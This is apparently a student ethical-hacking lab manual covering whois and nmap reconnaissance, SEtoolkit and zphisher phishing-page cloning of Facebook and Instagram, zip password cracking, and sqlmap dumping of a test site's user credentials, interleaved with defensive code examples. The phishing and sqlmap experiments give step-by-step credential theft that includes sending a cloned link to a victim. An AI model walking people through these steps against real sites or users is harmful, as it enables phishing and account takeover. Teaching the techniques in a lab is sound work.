Ethical - Hacking - Lab - Practicals

Uploaded by parveen saini

Experiment - 1

Passive Reconnaissance using whois, which is an online tool.

Steps-:
1. Open a browser and search “whois”.

2. Now open the first link, which appears as “whois.com”.

3. Now type any domain name like www.flipkart.com & search.

4. Information like contact details, administrative details, technical
details & raw whois data regarding that site will appear.
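The raw whois record returned in step 4 is plain key: value text, so the same lookup a recon step uses can be turned into a routine check on your own domains (registrar, name servers, and above all the expiry date, since a lapsed registration is how domains get hijacked). The parser below is an added example, not part of the lab manual; the whois record it parses is constructed and the `.test` names are not real registrations.

```python
"""Parse raw whois text into fields and warn when a domain's registration is close to expiry.
Added example, not part of the lab manual; SAMPLE_WHOIS is a constructed record."""
from datetime import datetime, timezone

# Constructed sample in the key: value layout registrars return (not a real record)
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE-SHOP.TEST
Registrar: Example Registrar, Inc.
Updated Date: 2023-01-15T10:22:31Z
Creation Date: 2010-03-02T00:00:00Z
Registry Expiry Date: 2024-03-02T00:00:00Z
Name Server: NS1.EXAMPLE-DNS.TEST
Name Server: NS2.EXAMPLE-DNS.TEST
Registrant Organization: Example Shop Ltd
Admin Email: admin@example-shop.test
>>> Last update of WHOIS database: 2023-06-01T12:00:00Z <<<
"""

# Field names that different registries use for the expiry date (assumed set, extend as needed)
EXPIRY_KEYS = ("registry expiry date", "expiry date", "expiration date")


def parse_whois(text):
    """Return {field: [values]}; repeated fields such as Name Server keep every value."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blank lines, the registry's trailer line, and anything without a key
        if not line or line.startswith(">>>") or ":" not in line:
            continue
        key, value = line.split(":", 1)       # split once: timestamps contain ':' too
        fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def days_until_expiry(fields, today_iso):
    """Days from today (YYYY-MM-DD) to the expiry date, or None if no expiry field exists."""
    today = datetime.strptime(today_iso, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    for key in EXPIRY_KEYS:
        if key in fields:
            expiry = datetime.strptime(fields[key][0], "%Y-%m-%dT%H:%M:%SZ")
            return (expiry.replace(tzinfo=timezone.utc) - today).days
    return None


def expiry_warning(text, today_iso, threshold_days=90):
    """Human-readable verdict: warn when the registration expires within threshold_days."""
    days = days_until_expiry(parse_whois(text), today_iso)
    if days is None:
        return "no expiry date found"
    if days <= threshold_days:
        return f"WARNING: expires in {days} days"
    return f"expires in {days} days"


if __name__ == "__main__":
    print(expiry_warning(SAMPLE_WHOIS, "2024-01-01"))
```

Run against the output of the `whois` command-line tool (or the raw data section of whois.com) for each domain you own; the threshold is deliberately generous because registrars send renewal reminders to the admin contact, and that contact is exactly the field that goes stale.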
Experiment - 2
Full scan, half open scan & stealth scan using “nmap”

1. Scanning single ip using nmap-:

Command: nmap IP-address-here


$ nmap 192.168.1.1

2. Scanning for single port -:


Command: sudo nmap -p <port no.> <ipaddress> or <weburl>

3. ICMP echo request ping -:


Command: nmap -sP -PE scanme.nmap.org
It will show this output:
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.089s latency).
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
4. Scanning using TCP SYN scan (half-open scan)
Command: sudo nmap -sS <target>

Output :- sudo nmap -sS scanme.nmap.org

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 09:43 EST


Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.18s latency).
Other addresses for scanme.nmap.org (not scanned):
2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
9929/tcp open nping-echo
31337/tcp open Elite

Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds

5. Service Version detection


Command: - nmap -sV scanme.nmap.org

$ nmap -sV scanme.nmap.org


Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-11 03:37 UTC
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.074s latency).
Other addresses for scanme.nmap.org (not scanned):
2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu
Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
9929/tcp open nping-echo Nping echo
31337/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds

6. FIN scan using nmap

Command: sudo nmap -sF <ipaddress>

Output :- krad# nmap -sF -T4 para

Starting Nmap ( https://nmap.org )


Nmap scan report for para (192.168.10.191)
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
53/tcp open|filtered domain
111/tcp open|filtered rpcbind
515/tcp open|filtered printer
6000/tcp open|filtered X11
MAC Address: 00:60:1D:38:32:90 (Lucent Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.64 seconds

Xmas scan (-sX) output on another host, for comparison:

krad# nmap -sX -T4 scanme.nmap.org

Starting Nmap ( https://nmap.org )


Nmap scan report for scanme.nmap.org (64.13.134.52)
Not shown: 999 open|filtered ports
PORT STATE SERVICE
113/tcp closed auth
Nmap done: 1 IP address (1 host up) scanned in 23.11 seconds
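The scan outputs above are what a defender compares against an approved service list: every open port that is not on the baseline is a finding to investigate, and the FIN and Xmas scans show why the state column must be read carefully (open|filtered means nmap could not tell, so those ports need a confirming SYN or connect scan rather than being recorded as open). The parser below is an added example, not part of nmap or of the lab manual; its two sample reports are copied from the scan output shown in this experiment, and the baseline set is an assumed value.

```python
"""Turn nmap's port table into an inventory, flag ports outside an approved baseline, and
separate ambiguous open|filtered results. Added example; samples are from this experiment."""
import re

# Sample 1: the -sS scan of scanme.nmap.org shown above
SYN_SCAN = """\
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
9929/tcp open nping-echo
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds
"""

# Sample 2: the -sF scan of host "para" shown above (FIN scans cannot distinguish open from filtered)
FIN_SCAN = """\
Nmap scan report for para (192.168.10.191)
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
53/tcp open|filtered domain
111/tcp open|filtered rpcbind
515/tcp open|filtered printer
6000/tcp open|filtered X11
MAC Address: 00:60:1D:38:32:90 (Lucent Technologies)
"""

# Longer alternatives first so "open|filtered" is not cut short at "open"
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+(\S+)"
)


def parse_ports(output):
    """Return a list of (port, proto, state, service) tuples found in an nmap report."""
    results = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            results.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return results


def unexpected_open_ports(output, baseline):
    """Open TCP ports that are not in the approved baseline set (each one is a finding)."""
    return sorted(
        port for port, proto, state, _ in parse_ports(output)
        if proto == "tcp" and state == "open" and port not in baseline
    )


def ambiguous_ports(output):
    """Ports whose state contains '|' (e.g. open|filtered): nmap could not decide, so they
    must be re-checked with a scan type that elicits a reply before being recorded."""
    return sorted(port for port, _, state, _ in parse_ports(output) if "|" in state)


if __name__ == "__main__":
    APPROVED = {22, 80}          # assumed baseline for the host
    print("unexpected:", unexpected_open_ports(SYN_SCAN, APPROVED))
    print("needs confirmation:", ambiguous_ports(FIN_SCAN))
```

For real use, prefer `nmap -oX` and parse the XML instead of the human-readable table, which nmap does not guarantee to keep stable; the text form is used here because it is what the experiment prints.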
Experiment - 3

Performing session / web jacking attack using SEtoolkit

Steps-:
Step 1: Check your IP address (Kali Linux).

Step 2: Check all the machines inside the network.

Command: netdiscover -r 192.168.243.0/24

From this we get the network IP, the default gateway and the broadcast IP.

Ping the unknown IP to check whether the host is live or not:

Command: ping 192.168.243.129


Now open the Social Engineering Toolkit in Kali Linux.

Command: setoolkit

Select the first option:

1) Social-Engineering Attacks

Since we have to perform website cloning, we have to choose the option

2) Website Attack Vectors

Then choose

5) Web Jacking Attack Method

Then

2) Site Cloner

After this it will ask you for an IP address (enter your Kali Linux
machine's IP address).

After this it will ask you to enter the URL of the website you want to
clone. In this example let's clone the Facebook website.

Paste the URL in the SET terminal and it will start cloning it.
Now the site has been cloned. You have to send the cloned website
to the victim so that he clicks on the link, and you will get his
credentials in your Kali Linux.
Once the victim clicks on the link, the victim will be
redirected to the login page.

Here I am typing the details :

User name: [email protected]

Password:123456
Now go to your Kali Linux and go to the location:

/root/.set/reports/2018-12-27 08:03:52.640607.html

In this file you will get all the credentials in clear text.
This is how we can get the credentials of the victim.
Experiment - 4

Performing phishing attack using the zphisher tool

Step 1: To install the tool, first go to the Desktop directory and then install the
tool using the following commands.
cd Desktop
git clone https://github.com/htr-tech/zphisher.git
cd zphisher

Step 2: Now you are in the zphisher directory; use the following command to run
the tool.
bash zphisher.sh
Step 3: The tool has started running successfully. Now you have to choose the
option for which you have to make the phishing page.

Step 4: From these options, you can choose the number for which you have to
create a phishing page. Suppose you want to create a phishing page for
Instagram; then choose option 2.
Step 5: Now you can see that, to attract the victim, it offers 4 different web
templates. You can choose any option from here. Suppose you want to choose
the first option; then type 1.

Example 1: Using the zphisher tool, create a phishing page of Instagram and
get the credentials (user id and password) of the victim.
After launching the tool you will see this interface.
You can send any of the links to the victim. Once he/she enters his/her id and
password, it will be reflected in the terminal.

You can see the link we have opened is ezlikers. This is the phishing page we
have opened. Now the user has to enter his/her id and password.
Experiment - 5
Active reconnaissance using the “Sam Spade” tool.

Step 1:
Open the Sam Spade tool. In the top left corner there is a
search bar; enter a domain name,
for example www.oracle.com, and then select the whois icon.
Now all the details of the website will be displayed on the
screen.

Step 2:
Now on the same page, using the same domain name (example
www.oracle.com), click on the ping icon.
Ping sends a series of packets to the indicated host to determine
whether that system is reachable via the network, and provides an
estimate of the round-trip packet time.
Step 3:
On the same page, using the same domain name (for example
www.oracle.com), click on the traceroute icon.
Traceroute shows the route packets take from your host to the
host you are looking at.
Step 4:

On the same page, using the same domain name (www.oracle.com), click on the web icon.

This will browse the web in raw HTTP format.

Experiment - 6
Performing password cracking using the John the Ripper tool.

Step 1:

Install the John the Ripper tool using the GitHub cloning technique.

Step 2:

Create a text file using the touch command.

Step 3:

Now create a zip of the created text file and set a password on it.

Step 4:

Now find the hash value of the zip file created above by running the zip2john command.
Step 5:

Now copy the hash value of the zip file to a new text file.

Step 6:

Now run the command: john --format=zip new.txt

This command will crack the password and display it.
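Step 6 succeeds quickly because the password chosen for the zip is short or sits in a wordlist, and john tries wordlists before it tries the full keyspace. The calculation below makes that budget explicit: the size of the character set raised to the length, divided by the guess rate, is the worst-case time for a brute-force run, and a wordlist hit costs nothing at all. It is an added example, not John the Ripper's code; the common-password list is a constructed stand-in for the wordlists crackers ship with, and the guess rate of 1e9 per second is an assumed figure for illustration.

```python
"""Estimate the guess budget a password must survive, to show why the zip password in this
experiment falls quickly and what a policy has to require. Added example, not john's code."""
import math

# Constructed stand-in for the common-password wordlists a cracker tries first
COMMON_PASSWORDS = {"123456", "password", "qwerty", "letmein", "12345678", "admin"}

# Printable ASCII has 95 characters: 26 lower, 26 upper, 10 digits, 33 punctuation/space
PUNCTUATION = 33


def charset_size(password):
    """Size of the character classes the password actually draws from (what brute force must cover)."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(not c.isalnum() for c in password):
        size += PUNCTUATION
    return size


def keyspace(password):
    """Number of candidates a brute-force run covers for this length and character mix."""
    return charset_size(password) ** len(password)


def worst_case_seconds(password, guesses_per_second):
    """Seconds to exhaust the keyspace; a wordlist entry costs effectively nothing."""
    if password in COMMON_PASSWORDS:
        return 0.0
    return keyspace(password) / guesses_per_second


def assess(password, guesses_per_second=1e9):
    """Coarse policy verdict (assumed thresholds: under an hour is weak, under ten years is moderate)."""
    if password in COMMON_PASSWORDS:
        return "in wordlist"
    secs = worst_case_seconds(password, guesses_per_second)
    if secs < 3600:
        return "weak"
    if secs < 3600 * 24 * 365 * 10:
        return "moderate"
    return "strong"


def bits_of_entropy(password):
    """log2 of the keyspace, the usual way to state the same budget."""
    return math.log2(keyspace(password)) if password else 0.0


if __name__ == "__main__":
    for pw in ("123456", "zip2024", "Tr0ub4dor&3-Xk9!"):
        print(f"{pw!r}: {assess(pw)} ({bits_of_entropy(pw):.1f} bits)")
```

Two caveats the numbers do not show: the legacy ZipCrypto format most `zip` builds use by default is itself cryptographically weak regardless of the password, so archives that must stay confidential should use AES encryption (for example `7z` or `zip -e` with an AES-capable build); and the character-class model overestimates passwords built from dictionary words with substitutions, which rule-based cracking handles well below the worst case.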
Experiment - 7
Using the sqlmap tool to access databases and tables.

Step 1:

Open a browser and search for a website (example: vulnweb.com), and then copy the link of that
website.

In another web page type

site: URL_copied/artist.php?artist=1

Now copy this link.

Step 2:

Now open a terminal and type

sqlmap -u <copied link> --dbs

This will fetch and then display all the databases present on that site.
Step 3:

Now type

sqlmap -u <copied link> -D acuart --tables

This will display all tables present in the acuart database.

Step 4:

Now type

sqlmap -u <copied link> -D acuart -T users --columns

This will display all the columns present in the users table of the acuart database.
Step 5:

Now type

sqlmap -u <copied link> -D acuart -T users -C pass --dump

This will show the data of the pass column of the users table in the acuart database.

In this way we got the password from the pass column of the users table.

Step 6:

Now type

sqlmap -u <copied link> -D acuart -T users -C uname --dump

This will show the data of the uname column of the users table in the acuart database.

In this way we got the user name from the users table.
Step 7:

Now open a browser, type the URL of the website on which you performed the sqlmap attack, and then log in
to that page using the credentials you got from the sqlmap attack.
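Everything sqlmap does in steps 2 to 6 depends on one defect in the page behind `artist.php?artist=1`: the parameter is spliced into the SQL text, so the input can change the query instead of only supplying a value. The example below reproduces that pattern and its fix side by side against an in-memory SQLite table. It is an added example, not the vulnerable site's code or sqlmap's; the table, column names and rows are constructed.

```python
"""The flaw sqlmap exploits in this experiment (a request parameter concatenated into SQL)
beside its fix (type check plus bound parameter), run against an in-memory SQLite table.
Added example; the schema and rows are constructed."""
import sqlite3


def make_db():
    """Constructed artists table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT)")
    conn.executemany(
        "INSERT INTO artists VALUES (?, ?)",
        [(1, "artist-one"), (2, "artist-two"), (3, "artist-three")],
    )
    return conn


def artist_vulnerable(conn, artist_param):
    """Mirrors a page that builds artist.php?artist=<value> by string concatenation.
    Whatever arrives in the parameter becomes SQL, which is what lets sqlmap enumerate
    databases, tables and columns far beyond the one artist row the page meant to show."""
    sql = "SELECT aname FROM artists WHERE artist_id = " + artist_param   # defect
    return [row[0] for row in conn.execute(sql)]


def artist_safe(conn, artist_param):
    """Hardened: validate the parameter's type, then bind it so the driver sends it as a
    value and the query text can never change."""
    if not artist_param.isdigit():
        raise ValueError("artist must be a positive integer")
    rows = conn.execute(
        "SELECT aname FROM artists WHERE artist_id = ?", (int(artist_param),)
    )
    return [row[0] for row in rows]


def safe_rejects(conn, artist_param):
    """True if the hardened handler refuses the parameter (useful for tests and logging)."""
    try:
        artist_safe(conn, artist_param)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("normal request:", artist_vulnerable(db, "1"))
    # The classic tautology: the concatenated query now matches every row
    print("tampered request, vulnerable handler:", artist_vulnerable(db, "1 OR 1=1"))
    print("tampered request, hardened handler rejects:", safe_rejects(db, "1 OR 1=1"))
```

The bound-parameter form is the fix, not input filtering: the driver never interprets the value as SQL, so there is nothing to filter. Step 5 also works only because the `pass` column stores passwords in clear; storing a salted hash would mean a successful dump still yields no usable credentials for step 7.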